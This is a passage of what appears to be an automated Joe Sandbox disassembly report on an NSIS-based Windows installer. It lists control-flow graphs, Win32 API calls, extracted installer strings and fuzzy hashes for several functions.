4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                            • ShowWindow.USER32(?), ref: 004054D2
                                                                            • DestroyWindow.USER32 ref: 004054E6
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                            • GetDlgItem.USER32(?,?), ref: 00405523
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                            • EnableWindow.USER32(?,?), ref: 00405757
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                            • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                            • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                            • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID: @rD
                                                                            • API String ID: 3282139019-3814967855
                                                                            • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                            • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                            Strings
                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                            • Jump: %d, xrefs: 00401602
                                                                            • Rename: %s, xrefs: 004018F8
                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                            • BringToFront, xrefs: 004016BD
                                                                            • Call: %d, xrefs: 0040165A
                                                                            • detailprint: %s, xrefs: 00401679
                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                            • Sleep(%d), xrefs: 0040169D
                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                            • API String ID: 2872004960-3619442763
                                                                            • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                            • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                            APIs
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                            • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                            • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                            • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                              • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                            • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                            • API String ID: 608394941-1650083594
                                                                            • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                            • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • lstrcatW.KERNEL32(00000000,00000000,JoyAustria,004CB0B0,00000000,00000000), ref: 00401A76
                                                                            • CompareFileTime.KERNEL32(-00000014,?,JoyAustria,JoyAustria,00000000,00000000,JoyAustria,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$JoyAustria
                                                                            • API String ID: 4286501637-4188998851
                                                                            • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                            • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403598
                                                                            • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                            Strings
                                                                            • soft, xrefs: 00403675
                                                                            • Error launching installer, xrefs: 004035D7
                                                                            • Null, xrefs: 0040367E
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                            • Inst, xrefs: 0040366C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-527102705
                                                                            • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                            • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004033E7
                                                                            • GetTickCount.KERNEL32 ref: 00403464
                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                            • wsprintfW.USER32 ref: 004034A4
                                                                            • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                            • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                            • String ID: ... %d%%$P1B$X1C$X1C
                                                                            • API String ID: 651206458-1535804072
                                                                            • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                            • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                            • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
